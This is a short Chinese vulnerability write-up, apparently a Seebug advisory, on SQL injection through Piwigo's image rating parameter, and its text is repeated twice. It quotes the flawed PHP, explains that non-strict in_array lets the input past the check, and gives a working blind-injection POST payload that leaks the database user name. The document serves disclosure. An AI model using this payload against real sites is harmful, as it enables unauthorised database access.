<ul><li>/include/functions_rate.inc.php</li></ul><pre class=""> if (!isset($rate) or !$conf['rate'] or !in_array($rate, $conf['rate_items'])) { return false; } …….. pwg_query($query); $query = ' INSERT INTO '.RATE_TABLE.' (user_id,anonymous_id,element_id,rate,date) VALUES (' .$user['id'].',' .'\''.$anonymous_id.'\',' .$image_id.',' .$rate .',NOW()) ;'; pwg_query($query); </pre><p>判断rate的时候用了in_array的非严格模式,导致可以绕过。rate直接拼接到SQL语句中,造成注入。</p><ul><li>/picture.php</li></ul><pre class=""> case 'rate' : { include_once(PHPWG_ROOT_PATH.'include/functions_rate.inc.php'); rate_picture($page['image_id'], $_POST['rate']); redirect($url_self); } <br></pre><p>用户传入的rate传入rate_picture函数。<br></p><p>当用户POST传入:</p><pre class="">rate=0+ascii(substring(user(),1,1))</pre><p>到:</p><pre class="">http://10.211.55.3/piwigo/picture.php?/1/category/1&action=rate</pre><p>页面返回: </p><p><img alt="4D49F07A-20C4-4CB5-8EE3-776CF1411E61.png"...
<ul><li>/include/functions_rate.inc.php</li></ul><pre class=""> if (!isset($rate) or !$conf['rate'] or !in_array($rate, $conf['rate_items'])) { return false; } …….. pwg_query($query); $query = ' INSERT INTO '.RATE_TABLE.' (user_id,anonymous_id,element_id,rate,date) VALUES (' .$user['id'].',' .'\''.$anonymous_id.'\',' .$image_id.',' .$rate .',NOW()) ;'; pwg_query($query); </pre><p>判断rate的时候用了in_array的非严格模式,导致可以绕过。rate直接拼接到SQL语句中,造成注入。</p><ul><li>/picture.php</li></ul><pre class=""> case 'rate' : { include_once(PHPWG_ROOT_PATH.'include/functions_rate.inc.php'); rate_picture($page['image_id'], $_POST['rate']); redirect($url_self); } <br></pre><p>用户传入的rate传入rate_picture函数。<br></p><p>当用户POST传入:</p><pre class="">rate=0+ascii(substring(user(),1,1))</pre><p>到:</p><pre class="">http://10.211.55.3/piwigo/picture.php?/1/category/1&action=rate</pre><p>页面返回: </p><p><img alt="4D49F07A-20C4-4CB5-8EE3-776CF1411E61.png" src="https://images.seebug.org/@/uploads/1434695209586-4D49F07A-20C4-4CB5-8EE3-776CF1411E61.png" data-image-size="262,153"><br></p><p>其中114为r的ascii码。</p>
